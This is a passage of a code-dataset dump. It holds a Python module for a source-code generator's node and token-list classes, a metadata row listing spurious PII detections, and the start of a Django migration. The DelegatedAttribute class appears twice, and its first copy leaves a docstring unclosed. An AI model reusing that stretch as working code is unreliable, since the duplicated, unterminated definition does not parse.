If not provided, the class this + method is called from is called with *obj* as its first and only parameter. + """""" + + if isinstance(obj, (cls, NodeABC)): + return obj + else: + if factory is not None: + return factory(obj) + else: + return cls(obj) + + def __init__(self, comment=None, side_comment=None, parent=None): + """""" All of the parameters should be used as keyword arguments, because they are forwarded from + the child classes, and the order of arrival is not guaranteed. + + :param comment: a comment node that will be printed next to the current node when the source code of + the node is generated. Usually, it is a block comment printed before the node + in languages that support them. This comment is printed by containers such as + :class:`NodeContainerBase`, so it does not require any support from the class. + + :param side_comment: a comment that will be printed just by the current node when the source code of + the node is generated. Usually, it is a one line comment, printed to the right of the + node. Be aware that this parameter is used by the class in whatever way it wants to, + and there is no guarantee it will be printed at all. + """""" + + # Should be EnsureNode descriptors with factory using phantom_node when given None in derived classes + self.comment = comment + # Should be EnsureNode descriptors with factory using phantom_node when given None in derived classes + self.side_comment = side_comment + + # We don't use try: ... except: to avoid catching exceptions + # occurring inside adopt_node call + if parent is not None: + if hasattr(parent, 'adopt_node'): + parent.adopt_node(self) + else: + raise NotImplementedError(""The given parent does not support child adoption"") + + + def freestanding_str(self, idt=None): + """"""See :class:`NodeABC` for the role of this function. + + This implementation just calls *inline_str* and prepends a new line and indentation string. + """""" + idt = Indentation.ensure_idt(idt) + snippet = self.inline_str(idt) + # Do not output anything if the string is empty + if snippet: + return '\n'+str(idt)+snippet + else: + return '' + + def __str__(self, idt=None): + """"""This implementation tries to print the node by probing the object for some methods: + + 1. *decl()*: it is usually used to return a :class:`NodeViewBase` corresponding to the declaration of the node + 2. *defi()*: it is usually used to return a :class:`NodeViewBase` corresponding to the definition of the node + 3. *freestanding_str()*: see :class:`NodeABC` + """""" + # We don't use try: ... except: to avoid catching exceptions + # occurring inside freestanding_str call + + # Try to display a declaration + if hasattr(self, 'decl'): + self_decl = self.decl() + if isinstance(self_decl, NodeABC): + return self_decl.freestanding_str(idt) + # Or a definition + elif hasattr(self, 'defi'): + self_defi = self.defi() + if isinstance(self_defi, NodeABC): + return self_defi.freestanding_str(idt) + + else: + return self.freestanding_str(idt) + + def adopt_node(self, child): + self.append(child) + + +class DelegatedAttribute: + """"""This class is a descriptor that allows an object to use the value of the same attribute of another instance. + + For example, the comment attribute of a parent node of a :class:`NodeViewBase` instance is used as the comment + attribute of the :class:`NodeViewBase` instance if the comment attribute was not explicitly set on the + :class:`NodeViewBase` instance. When that attribute is set, it uses its own value instead of referring to the parent's + one.
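+ + A minimal sketch (the class name is hypothetical): + + class VarView(NodeViewBase): + comment = DelegatedAttribute('comment', 'parent') + + Reading *view.comment* then falls back to *view.parent.comment* until a value is + explicitly assigned on the view itself.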
+
+class DelegatedAttribute:
+    """"""This class is a descriptor that allows an object to use the value of an attribute of another
+    instance as its own.
+
+    For example, the comment attribute of the parent node of a :class:`NodeViewBase` instance is
+    used as the comment attribute of the :class:`NodeViewBase` instance if the comment attribute was
+    not explicitly set on the :class:`NodeViewBase` instance. When that attribute is set, the
+    instance uses its own value instead of referring to its parent's one.
+    """"""
+    def __init__(self, attr_name, delegated_to_attr_name, descriptor=None, default_value_list=tuple()):
+        """"""
+        :param attr_name: the name of the attribute to manage.
+        :param delegated_to_attr_name: the name of the attribute holding a reference to the other
+                                       instance also holding an *attr_name* attribute.
+        :param descriptor: a descriptor class, in case the attribute should be managed through a
+                           descriptor. This allows basic descriptor chaining.
+        :param default_value_list: a list of default values that do not trigger the switch to the
+                                   local attribute. For example, if a class sets a *comment*
+                                   attribute to None by default, the attribute lookup should still
+                                   be made in the other instance. That way, it allows some
+                                   placeholder value to be set, without altering the intended
+                                   behavior.
+        """"""
+        self.attr_name = attr_name
+        self.delegated_to_attr_name = delegated_to_attr_name
+        self.descriptor = descriptor
+        self.default_value_list = default_value_list
+
+    def __get__(self, instance, owner):
+        if instance is not None:
+            # If the attribute has been set on the instance, just get it
+            if instance.__dict__.get('__'+self.attr_name+'_is_set', False):
+                if self.descriptor is not None:
+                    return self.descriptor.__get__(instance, owner)
+                else:
+                    return instance.__dict__[self.attr_name]
+
+            # Else it means that the attribute has not been set,
+            # so we delegate to the parent
+            else:
+                parent = getattr(instance, self.delegated_to_attr_name)
+                return getattr(parent, self.attr_name)
+
+        # If the descriptor is called as a class attribute, it
+        # just returns itself, to allow the world to see that it
+        # is a descriptor
+        else:
+            return self
+
+    def __set__(self, instance, value):
+        if self.descriptor is not None:
+            self.descriptor.__set__(instance, value)
+        else:
+            instance.__dict__[self.attr_name] = value
+
+        # If the value is one of the default_value_list, do not consider that the attribute was
+        # set. This allows some code in base classes to set the attribute to None
+        # by default, and still get the parent's attribute when it is the case
+        if value not in self.default_value_list:
+            instance.__dict__['__'+self.attr_name+'_is_set'] = True
+
+class NodeViewBase(NodeBase):
+    """"""This is the base class of nodes that are views of other nodes.
+
+    For example, a variable declaration is a view of the variable, as it only displays
+    information already contained in the variable object.
+    View nodes should store the reference of their parent in a *parent* attribute.
+    """"""
+    def __init__(self, parent, *args, **kwargs):
+        self.parent = parent
+        super().__init__(*args, **kwargs)
+
+    def __eq__(self, other):
+        """"""Implementation of the equality test between two views:
+        it checks that the two views have the same parent and are of the exact same type.
+        """"""
+        return type(self) is type(other) and self.parent is other.parent
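+
+# Hedged usage sketch, not part of the original module: a view reads *label*
+# from its parent until the attribute is explicitly set on the view itself,
+# and None acts as a placeholder that keeps delegating. ``Parent`` and
+# ``View`` are hypothetical classes defined only for this example.
+def _delegated_attribute_example():
+    class Parent:
+        label = 'parent label'
+
+    class View:
+        label = DelegatedAttribute('label', 'parent', default_value_list=(None,))
+        def __init__(self, parent):
+            self.parent = parent
+
+    view = View(Parent())
+    assert view.label == 'parent label'   # delegated lookup
+    view.label = None                     # default value: still delegated
+    assert view.label == 'parent label'
+    view.label = 'own label'              # now set locally
+    assert view.label == 'own label'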
+
+class PhantomNode(NodeBase):
+    """"""This class is a node that will be printed as an empty string.
+
+    It is intended to be used as a placeholder when a :class:`NodeABC` instance is required.
+    """"""
+    # PhantomNode must not call Node.__init__ because it causes infinite
+    # recursion when built from Node.__init__
+    def __init__(self, *args, **kwargs):
+        self.parent = self
+        self.comment = self
+        self.side_comment = self
+
+    def inline_str(self, idt=None):
+        return ''
+
+    freestanding_str = inline_str
+
+# Instance used everywhere, instead of creating billions of identical PhantomNodes
+PHANTOM_NODE = PhantomNode()
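+
+# Hedged usage sketch, not part of the original module: the shared
+# PHANTOM_NODE placeholder renders as an empty string in both printing
+# contexts, so it can stand in wherever a NodeABC instance is required.
+def _phantom_node_example():
+    assert PHANTOM_NODE.inline_str() == ''
+    assert PHANTOM_NODE.freestanding_str() == ''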
+
+class NodeContainerBase(NodeBase, collections.MutableSequence, NonIterable):
+    """"""This is the base class of all the nodes that contain a list of other nodes.
+
+    It implements all the logic for operator overloading, and for printing the nodes that it takes
+    care of. It also derives from the :class:`collections.MutableSequence` abstract base class, so
+    it behaves like a list. The only exception is that, when given to :func:`listify`, it remains a
+    single object, because it also derives from :class:`NonIterable`. This is intended to allow the
+    user to add nodes to it later, with the result taken into account by the consumer that used
+    :func:`listify` on it. If that were not the case, the consumer using :func:`listify` would end
+    up with a list of nodes frozen at the time :func:`listify` was called.
+
+    The other important aspect of this class is that it can guarantee the type of the contained
+    nodes, even when overloaded operators like *+=* are used. See the *node_classinfo* and
+    *node_factory* constructor arguments.
+    """"""
+
+    default_node_classinfo = (NodeABC,)
+
+    def __init__(self, node_list=None, node_classinfo=None, node_factory=None, *args, **kwargs):
+        """"""
+        :param node_list: the list of nodes that the container contains.
+        :param node_classinfo: a tuple of classes used to check the nodes that enter the container.
+                               If a node is not an instance of one of the *node_classinfo* classes,
+                               it is passed to *node_factory*. All of the classes in *node_classinfo*
+                               must be subclasses of :class:`NodeABC`.
+        :param node_factory: a factory used when an object which is not an instance of one of the
+                             classes of *node_classinfo* tries to enter the container. The return
+                             value of this factory is then allowed inside.
+        """"""
+        node_classinfo_tuple = tuple(listify(node_classinfo))
+        for classinfo in node_classinfo_tuple:
+            if not issubclass(classinfo, NodeABC):
+                raise ValueError('node_classinfo must be a subclass of NodeABC')
+
+        node_list = listify(node_list)
+
+        if node_classinfo is None:
+            self.node_classinfo = self.default_node_classinfo
+        else:
+            self.node_classinfo = node_classinfo_tuple
+
+        if node_factory is None:
+            # If node_classinfo is None, then self.node_classinfo contains default_node_classinfo
+            # which is only composed of NodeABC, and therefore cannot be used as a factory
+            if node_classinfo is None:
+                raise ValueError(
+                    'You must specify a node factory or give a class that can be used as a factory as first item of node_classinfo'
+                )
+
+            # The first element in the tuple is taken as the factory
+            node_factory = self.node_classinfo[0]
+
+        # A wrapper to make sure that the output of the node_factory is
+        # indeed a NodeABC
+        def make_node_factory_wrapper(factory):
+            def wrapper(node):
+                result = factory(node)
+                if not isinstance(result, NodeABC):
+                    raise ValueError(""The node factory did not give a NodeABC"")
+                else:
+                    return result
+            return wrapper
+
+        self.node_factory = make_node_factory_wrapper(node_factory)
+
+        self.node_list = [
+            item if isinstance(item, self.node_classinfo) else self.node_factory(item)
+            for item in node_list
+        ]
+        super().__init__(*args, **kwargs)
+
+    def inline_str(self, idt=None):
+        """"""Print all the contained nodes using their *freestanding_str* method,
+        because a container is a freestanding context.
+        It also strips the blank lines at the beginning.
+        """"""
+        snippet = """"
+        for node in self.node_list:
+            if hasattr(node, 'comment'):
+                snippet += node.comment.freestanding_str(idt)
+            snippet += node.freestanding_str(idt)
+
+        return strip_starting_blank_lines(snippet)
+
+    def freestanding_str(self, idt=None):
+        """"""Calls super().freestanding_str, and strips the blank lines at the beginning.
+        """"""
+        snippet = super().freestanding_str(idt)
+        return strip_starting_blank_lines(snippet)
+
+    def __copy__(self):
+        cls = type(self)
+        new_obj = cls.__new__(cls)
+        new_obj.__dict__.update(self.__dict__)
+        new_obj.node_list = copy.copy(self.node_list)
+        new_obj.node_classinfo = copy.copy(self.node_classinfo)
+        new_obj.node_factory = copy.copy(self.node_factory)
+        return new_obj
+
+    def clear(self):
+        # We preserve the object itself, we do not build a new one
+        self[:] = []
+
+    def insert(self, index, value):
+        elem_list = listify(value)
+        for i, elem in enumerate(elem_list):
+            if not isinstance(elem, self.node_classinfo):
+                elem = self.node_factory(elem)
+            self.node_list.insert(index+i, elem)
+
+    def index(self, *args, **kwargs):
+        return self.node_list.index(*args, **kwargs)
+
+    def count(self, *args, **kwargs):
+        return self.node_list.count(*args, **kwargs)
+
+    def pop(self, *args, **kwargs):
+        return self.node_list.pop(*args, **kwargs)
+
+    def reverse(self):
+        self.node_list.reverse()
+
+    def remove(self, *args, **kwargs):
+        self.node_list.remove(*args, **kwargs)
+
+    @abc.abstractmethod
+    def __add__(self, other):
+        return type(self)((self, other))
+
+    @abc.abstractmethod
+    def __radd__(self, other):
+        return type(self)((other, self))
+
+    def __iadd__(self, other):
+        other_list = listify(other)
+        typed_other_list = [
+            item if isinstance(item, self.node_classinfo) else self.node_factory(item)
+            for item in other_list
+        ]
+        self.node_list.extend(typed_other_list)
+        return self
+
+    def append(self, other):
+        self.__iadd__(other)
+
+    def extend(self, other_list):
+        other_list = listify(other_list)
+        for other in other_list:
+            self.append(other)
+
+    def __mul__(self, other):
+        if isinstance(other, numbers.Integral):
+            self_copy = copy.copy(self)
+            self_copy.node_list = self.node_list * other
+            return self_copy
+        else:
+            return NotImplemented
+
+    def __rmul__(self, other):
+        return self.__mul__(other)
+
+    def __imul__(self, other):
+        if isinstance(other, numbers.Integral):
+            self.node_list *= other
+            return self
+        else:
+            return NotImplemented
+
+    def __contains__(self, item):
+        return item in self.node_list
+
+    def __reversed__(self):
+        return reversed(self.node_list)
+
+    def __getitem__(self, key):
+        return self.node_list[key]
+
+    def __setitem__(self, key, value):
+        if not isinstance(value, self.node_classinfo):
+            value = self.node_factory(value)
+
+        self.node_list[key] = value
+
+    def __delitem__(self, key):
+        del self.node_list[key]
+
+    def __len__(self):
+        return len(self.node_list)
+
+    def __iter__(self):
+        return iter(self.node_list)
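+
+# Hedged usage sketch, not part of the original module: a concrete container
+# must override the abstract __add__/__radd__, and delegating to super()
+# keeps the default behaviour. ``DemoContainer`` is hypothetical, TokenListBase
+# (defined further down) serves as both the type check and the coercion
+# factory, and listify() is assumed to wrap a plain integer into a one-element
+# list.
+def _node_container_example():
+    class DemoContainer(NodeContainerBase):
+        def __add__(self, other):
+            return super().__add__(other)
+        def __radd__(self, other):
+            return super().__radd__(other)
+
+    container = DemoContainer([], node_classinfo=(TokenListBase,))
+    container.append(42)   # not a TokenListBase: coerced through TokenListBase(42)
+    assert isinstance(container[0], TokenListBase)
+    assert len(container) == 1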
+
+class TokenListABC(NodeBase, NonIterable, collections.MutableSequence):
+    """"""This class is an abstract base class for all classes that are token lists.
+
+    A token list is an object that holds a sequence of tokens, which get concatenated when printed.
+    The tokens are turned into strings only when the token list is printed, which is why it is the
+    lazy building block of source code constructs like expressions and many others.
+
+    When printed, the token list should call *inline_str* on its tokens if the token is a
+    :class:`NodeABC`, or the builtin :func:`str` otherwise.
+    """"""
+    pass
+
+class DelegatedTokenListBase(TokenListABC):
+    """"""This is the base class for token list classes that forward the calls to the
+    :class:`TokenListABC` API to an attribute.
+
+    This class implements stubs to allow transparent object composition.
+    """"""
+    @property
+    def tokenlist_attr(self):
+        """"""This property gives the attribute holding the real token list.""""""
+        attr = getattr(self, self.tokenlist_attr_name)
+        if not isinstance(attr, TokenListABC):
+            raise AttributeError('The attribute '+self.tokenlist_attr_name+' is not a TokenListABC')
+        else:
+            return attr
+
+    @tokenlist_attr.setter
+    def tokenlist_attr(self, value):
+        return setattr(self, self.tokenlist_attr_name, value)
+
+    def __init__(self, tokenlist_attr_name, *args, **kwargs):
+        """"""
+        :param tokenlist_attr_name: the name of the attribute holding the real token list
+        """"""
+        self.tokenlist_attr_name = tokenlist_attr_name
+        super().__init__(*args, **kwargs)
+
+    def inline_str(self, idt=None):
+        return self.tokenlist_attr.inline_str(idt)
+
+    def freestanding_str(self, idt=None):
+        return self.tokenlist_attr.freestanding_str(idt)
+
+    def index(self, *args, **kwargs):
+        return self.tokenlist_attr.index(*args, **kwargs)
+
+    def insert(self, *args, **kwargs):
+        return self.tokenlist_attr.insert(*args, **kwargs)
+
+    def count(self, *args, **kwargs):
+        return self.tokenlist_attr.count(*args, **kwargs)
+
+    def pop(self, *args, **kwargs):
+        return self.tokenlist_attr.pop(*args, **kwargs)
+
+    def reverse(self):
+        self.tokenlist_attr.reverse()
+
+    def remove(self, *args, **kwargs):
+        self.tokenlist_attr.remove(*args, **kwargs)
+
+    def __add__(self, other):
+        self_copy = copy.copy(self)
+        self_copy.tokenlist_attr = self_copy.tokenlist_attr.__add__(other)
+        return self_copy
+
+    def __radd__(self, other):
+        self_copy = copy.copy(self)
+        self_copy.tokenlist_attr = self_copy.tokenlist_attr.__radd__(other)
+        return self_copy
+
+    def append(self, other):
+        self.tokenlist_attr.append(other)
+
+    def __iadd__(self, *args, **kwargs):
+        self.tokenlist_attr.__iadd__(*args, **kwargs)
+        return self
+
+    def extend(self, other_list):
+        self.tokenlist_attr.extend(other_list)
+
+    def __mul__(self, other):
+        self_copy = copy.copy(self)
+        self_copy.tokenlist_attr = self_copy.tokenlist_attr.__mul__(other)
+        return self_copy
+
+    def __rmul__(self, *args, **kwargs):
+        self_copy = copy.copy(self)
+        self_copy.tokenlist_attr = self_copy.tokenlist_attr.__rmul__(*args, **kwargs)
+        return self_copy
+
+    def __imul__(self, other):
+        self.tokenlist_attr.__imul__(other)
+        return self
+
+    def __contains__(self, *args, **kwargs):
+        return self.tokenlist_attr.__contains__(*args, **kwargs)
+
+    def __iter__(self):
+        return self.tokenlist_attr.__iter__()
+
+    def __reversed__(self):
+        return self.tokenlist_attr.__reversed__()
+
+    def __getitem__(self, key):
+        return self.tokenlist_attr.__getitem__(key)
+
+    def __setitem__(self, key, value):
+        self.tokenlist_attr.__setitem__(key, value)
+
+    def __delitem__(self, key):
+        self.tokenlist_attr.__delitem__(key)
+
+    def __len__(self):
+        return self.tokenlist_attr.__len__()
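+
+# Hedged usage sketch, not part of the original module: the wrapper exposes
+# the full token list API of the object stored in its *payload* attribute.
+# ``DemoWrapper`` is a hypothetical class defined only for this example;
+# TokenListBase (defined just below) provides the underlying storage.
+def _delegated_token_list_example():
+    class DemoWrapper(DelegatedTokenListBase):
+        def __init__(self, payload):
+            self.payload = payload
+            super().__init__('payload')
+
+    wrapper = DemoWrapper(TokenListBase(['a', 'b']))
+    wrapper.append('c')   # forwarded to the underlying token list
+    assert wrapper.inline_str() == 'abc'
+    assert len(wrapper) == 3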
+
+class TokenListBase(TokenListABC):
+    """"""This base class implements the :class:`TokenListABC` API with all of the operator
+    overloading logic.
+    """"""
+    def __init__(self, token_list=None, *args, **kwargs):
+        """"""
+        :param token_list: the list of tokens to store inside the token list
+        """"""
+        self._token_list = listify(token_list)
+        super().__init__(*args, **kwargs)
+
+    def inline_str(self, idt=None):
+        """"""Print the tokens of the token list and concatenate all the resulting strings.
+
+        If the token is a :class:`NodeABC`, its *inline_str* method is used.
+        Otherwise, the :func:`str` builtin is called on the token.
+        """"""
+        string = ''
+        for token in self._token_list:
+            if token is self:
+                # Special handling of self: allows printing itself using
+                # a different method to avoid infinite recursion and to provide
+                # a means for subclasses to implement self printing without creating a
+                # ""self-printer"" class dedicated to printing themselves
+                string += self.self_inline_str(idt)
+            elif isinstance(token, NodeABC):
+                string += token.inline_str(idt)
+            else:
+                string += str(token)
+
+        return string
+
+    def index(self, *args, **kwargs):
+        return self._token_list.index(*args, **kwargs)
+
+    def insert(self, *args, **kwargs):
+        return self._token_list.insert(*args, **kwargs)
+
+    def count(self, *args, **kwargs):
+        return self._token_list.count(*args, **kwargs)
+
+    def pop(self, *args, **kwargs):
+        return self._token_list.pop(*args, **kwargs)
+
+    def reverse(self):
+        self._token_list.reverse()
+
+    def remove(self, *args, **kwargs):
+        self._token_list.remove(*args, **kwargs)
+
+    def __add__(self, other):
+        if isinstance(other, TokenListABC):
+            other_list = list(other)
+            self_copy = copy.copy(self)
+            self_copy._token_list = self._token_list+other_list
+            return self_copy
+        # The result of the addition with a NodeContainer is a NodeContainer
+        elif isinstance(other, NodeContainerBase):
+            return other.__radd__(self)
+        else:
+            other_list = listify(other)
+            self_copy = copy.copy(self)
+            self_copy._token_list = self._token_list+other_list
+            return self_copy
+
+    def __radd__(self, other):
+        other_list = listify(other)
+        self_copy = copy.copy(self)
+        self_copy._token_list = other_list+self._token_list
+        return self_copy
+
+    def append(self, other):
+        if isinstance(other, TokenListABC):
+            other_list = tuple(other)
+        else:
+            other_list = listify(other)
+
+        self._token_list.extend(other_list)
+        return self
+
+    def __iadd__(self, *args, **kwargs):
+        self.append(*args, **kwargs)
+        return self
+
+    def extend(self, other_list):
+        other_list = listify(other_list)
+        for other in other_list:
+            self.append(other)
+
+    def __mul__(self, other):
+        if isinstance(other, numbers.Integral):
+            self_copy = copy.copy(self)
+            self_copy._token_list = self._token_list * other
+            return self_copy
+        else:
+            return NotImplemented
+
+    def __rmul__(self, *args, **kwargs):
+        return self.__mul__(*args, **kwargs)
+
+    def __imul__(self, other):
+        if isinstance(other, numbers.Integral):
+            self._token_list *= other
+            return self
+        else:
+            return NotImplemented
+
+    def __contains__(self, *args, **kwargs):
+        return self._token_list.__contains__(*args, **kwargs)
+
+    def __iter__(self):
+        return iter(self._token_list)
+
+    def __reversed__(self):
+        return reversed(self._token_list)
+
+    def __getitem__(self, key):
+        return self._token_list[key]
+
+    def __setitem__(self, key, value):
+        self._token_list[key] = value
+
+    def __delitem__(self, key):
+        del self._token_list[key]
+
+    def __len__(self):
+        return len(self._token_list)
+
+class _IndentedTokenListBase:
+    """"""This class is the base class that implements a token list which indents its content when printed.""""""
+    def inline_str(self, idt=None):
+        idt = Indentation.ensure_idt(idt)
+
+        snippet = super().inline_str(idt)
+        indented_new_line = ""\n""+str(idt)
+        snippet = snippet.replace(""\n"", indented_new_line)
+        return snippet
+
+class IndentedTokenListBase(_IndentedTokenListBase, TokenListBase):
+    """"""This class is a base class for token lists that indent their content when printed.""""""
+    pass
+
+class IndentedDelegatedTokenListBase(_IndentedTokenListBase, DelegatedTokenListBase):
+    """"""This is a mix between :class:`DelegatedTokenListBase` and :class:`IndentedTokenListBase`.""""""
+    pass
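+
+# Hedged usage sketch, not part of the original module: tokens are only
+# turned into strings when the list is printed, and non-node tokens go
+# through str(). The demo function name is hypothetical.
+def _token_list_example():
+    expr = TokenListBase(['x', ' + ', 42])
+    expr += [' + y']   # in-place concatenation
+    assert expr.inline_str() == 'x + 42 + y'
+    doubled = expr * 2   # repetition returns a copy, the original is untouched
+    assert doubled.inline_str() == 'x + 42 + yx + 42 + y'
+    assert expr.inline_str() == 'x + 42 + y'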
+
+class BacktraceBase(TokenListBase, NonIterable, metaclass=abc.ABCMeta):
+    """"""This base class allows instances to record the backtrace of the Python code that
+    created them.
+
+    This allows one to add comments in generated source code showing which file and line of the
+    Python script was responsible for creating it. This is a convenience when debugging the source
+    code generator, and can avoid headaches when one wants to track down which line of Python
+    generated which line of generated source code.
+    As a convenience, it is a subclass of :class:`TokenListBase`, so it can be used inside a
+    comment for example.
+    """"""
+    __frame_format_string = '{filename}:{lineno}({function})'
+    __frame_joiner = ', '
+
+    def __init__(self, level=0, *args, **kwargs):
+        stack = inspect.stack()
+        self.stack_frame_list = [
+            frame[1:] for frame in stack
+            if os.path.dirname(frame[1]) != os.path.dirname(__file__)
+        ]
+
+        super().__init__(self, *args, **kwargs)
+
+    @abc.abstractmethod
+    def freestanding_str(self, idt=None):
+        # Construct a comment by giving itself as a token and use its freestanding_str method
+        pass
+
+    def self_inline_str(self, idt=None):
+        return self.__frame_joiner.join(
+            self.__frame_format_string.format(
+                filename = os.path.relpath(frame[0]),
+                lineno = frame[1],
+                function = frame[2],
+                line_content = frame[3][frame[4]] if frame[3] is not None else ''
+            ) for frame in self.stack_frame_list
+        )
+",41613,"[['EMAIL_ADDRESS', 'dummy@email.com'], ['DATE_TIME', '2014'], ['PERSON', 'Douglas RAILLARD'], ['PERSON', 'Douglas RAILLARD'], ['PERSON', 'lower_underscore_case'], ['PERSON', "bases[0].__dict__['_'+bases[0].__name__+'__format_string"], ['LOCATION', 'self.node_classinfo'], ['LOCATION', 'self.node_classinfo'], ['NRP', 'self.comment'], ['PERSON', 'decl'], ['PERSON', 'freestanding_str'], ['PERSON', 'decl'], ['LOCATION', 'self.descriptor.__set__(instance'], ['PERSON', 'freestanding_str = inline_str\n\n'], ['PERSON', 'default_node_classinfo ='], ['PERSON', "ValueError('node_classinfo"], ['NRP', 'node_list'], ['LOCATION', 'self.node_classinfo'], ['LOCATION', 'self.node_classinfo'], ['LOCATION', 'isinstance(item'], ['LOCATION', 'self.node_classinfo'], ['LOCATION', 'self.node_classinfo'], ['PERSON', '@abc.abstractmethod'], ['PERSON', '@abc.abstractmethod'], ['LOCATION', 'isinstance(item'], ['LOCATION', 'self.node_classinfo'], ['NRP', 'self_copy.node_list'], ['LOCATION', 'self.node_classinfo'], ['PERSON', 'Whan'], ['PERSON', '@tokenlist_attr.setter\n def'], ['LOCATION', 'TokenListBase'], ['LOCATION', 'IndentedDelegatedTokenListBase(_IndentedTokenListBase'], ['PERSON', '@abc.abstractmethod'], ['PERSON', 'lineno ='], ['PERSON', 'line_content = frame[3][frame[4]'], ['URL', 'http://www.gnu.org/licenses/'], ['IP_ADDRESS', ' '], ['IP_ADDRESS', ':: '], ['URL', 'email.com'], ['URL', 'collections.It'], ['URL', 'collections.It'], ['URL', 'token.ca'], ['URL', 'token.ca'], ['URL', 'idt.in'], ['URL', 'numbers.Int'], ['URL', 'self.in'], ['URL', 'self.in'], ['URL', 'self.in'], ['URL', 'self.in'], ['URL', 'self.in'], ['URL', 'self.in'], ['URL', 'collections.It'], ['URL', 'NodeABC.in'], ['URL', 'NodeABC.se'], ['URL', 'self.in'], ['URL', 'self.at'], ['URL', 'self.at'], ['URL', 'self.at'], ['URL', 'self.at'], ['URL', 'self.st'], ['URL', 'self.no'], ['URL',
'inspect.is'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.st'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.st'], ['URL', 'self.com'], ['URL', 'self.si'], ['URL', 'parent.ad'], ['URL', 'self.in'], ['URL', 'self.de'], ['URL', 'decl.fr'], ['URL', 'self.de'], ['URL', 'defi.fr'], ['URL', 'self.fr'], ['URL', 'self.at'], ['URL', 'self.de'], ['URL', 'self.de'], ['URL', 'self.de'], ['URL', 'self.at'], ['URL', 'self.de'], ['URL', 'self.de'], ['URL', 'self.at'], ['URL', 'self.de'], ['URL', 'self.at'], ['URL', 'self.de'], ['URL', 'self.de'], ['URL', 'self.at'], ['URL', 'self.de'], ['URL', 'self.at'], ['URL', 'self.pa'], ['URL', 'self.pa'], ['URL', 'other.pa'], ['URL', 'self.pa'], ['URL', 'self.com'], ['URL', 'self.si'], ['URL', 'collections.Mu'], ['URL', 'collections.Mu'], ['URL', 'self.no'], ['URL', 'self.de'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'node.comment.fr'], ['URL', 'node.fr'], ['URL', 'obj.no'], ['URL', 'copy.co'], ['URL', 'self.no'], ['URL', 'obj.no'], ['URL', 'copy.co'], ['URL', 'self.no'], ['URL', 'obj.no'], ['URL', 'copy.co'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'list.in'], ['URL', 'self.no'], ['URL', 'list.in'], ['URL', 'self.no'], ['URL', 'list.co'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'list.re'], ['URL', 'self.no'], ['URL', 'list.re'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'numbers.Int'], ['URL', 'copy.co'], ['URL', 'copy.no'], ['URL', 'self.no'], ['URL', 'numbers.Int'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'collections.Mu'], ['URL', 'self.to'], ['URL', 'self.to'], ['URL', 'attr.se'], ['URL', 'self.to'], ['URL', 'self.to'], ['URL', 'self.to'], ['URL', 'attr.in'], ['URL', 'self.to'], ['URL', 'attr.fr'], ['URL', 'self.to'], ['URL', 'attr.in'], ['URL', 'self.to'], ['URL', 'attr.in'], ['URL', 'self.to'], ['URL', 'attr.in'], ['URL', 'self.to'], ['URL', 'attr.co'], ['URL', 'self.to'], ['URL', 'self.to'], ['URL', 'attr.re'], ['URL', 'self.to'], ['URL', 'attr.re'], ['URL', 'copy.co'], ['URL', 'copy.to'], ['URL', 'copy.to'], ['URL', 'copy.co'], ['URL', 'copy.to'], ['URL', 'copy.to'], ['URL', 'self.to'], ['URL', 'self.to'], ['URL', 'self.to'], ['URL', 'copy.co'], ['URL', 'copy.to'], ['URL', 'copy.to'], ['URL', 'copy.co'], ['URL', 'copy.to'], ['URL', 'copy.to'], ['URL', 'self.to'], ['URL', 'self.to'], ['URL', 'self.to'], ['URL', 'self.to'], ['URL', 'self.to'], ['URL', 'self.to'], ['URL', 'self.to'], ['URL', 'self.to'], ['URL', 'self.se'], ['URL', 'token.in'], ['URL', 'list.in'], ['URL', 'list.in'], ['URL', 'list.in'], ['URL', 'list.co'], ['URL', 'list.re'], ['URL', 'list.re'], ['URL', 'copy.co'], ['URL', 'copy.co'], ['URL', 'copy.co'], ['URL', 'numbers.Int'], ['URL', 'copy.co'], ['URL', 'numbers.Int'], ['URL', 'snippet.re'], ['URL', 'inspect.st'], ['URL', 'self.st'], ['URL', 'os.pa'], ['URL', 'os.pa'], ['URL', 'joiner.jo'], ['URL', 'string.fo'], ['URL', 'os.path.re'], ['URL', 'self.st']]" +41,"# -*- coding: utf-8 -*- +import datetime +from south.db import db +from south.v2 import SchemaMigration +from django.db import models + + +class Migration(SchemaMigration): + + def forwards(self, orm): + db.execute(""create index 
canvas_comment_id_and_visibility_and_parent_comment_id on canvas_comment (id, visibility, parent_comment_id);"") + + def backwards(self, orm): + raise RuntimeError(""Cannot reverse this migration."") + + models = { + 'auth.group': { + 'Meta': {'object_name': 'Group'}, + 'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), + 'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}), + 'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': ""orm['auth.Permission']"", 'symmetrical': 'False', 'blank': 'True'}) + }, + 'auth.permission': { + 'Meta': {'ordering': ""('content_type__app_label', 'content_type__model', 'codename')"", 'unique_together': ""(('content_type', 'codename'),)"", 'object_name': 'Permission'}, + 'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}), + 'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': ""orm['contenttypes.ContentType']""}), + 'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), + 'name': ('django.db.models.fields.CharField', [], {'max_length': '50'}) + }, + 'auth.user': { + 'Meta': {'object_name': 'User'}, + 'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}), + 'email': ('django.db.models.fields.EmailField', [], {'max_length': '254', 'blank': 'True'}), + 'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}), + 'groups': ('django.db.models.fields.related.ManyToManyField', [], {'to': ""orm['auth.Group']"", 'symmetrical': 'False', 'blank': 'True'}), + 'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), + 'is_active': 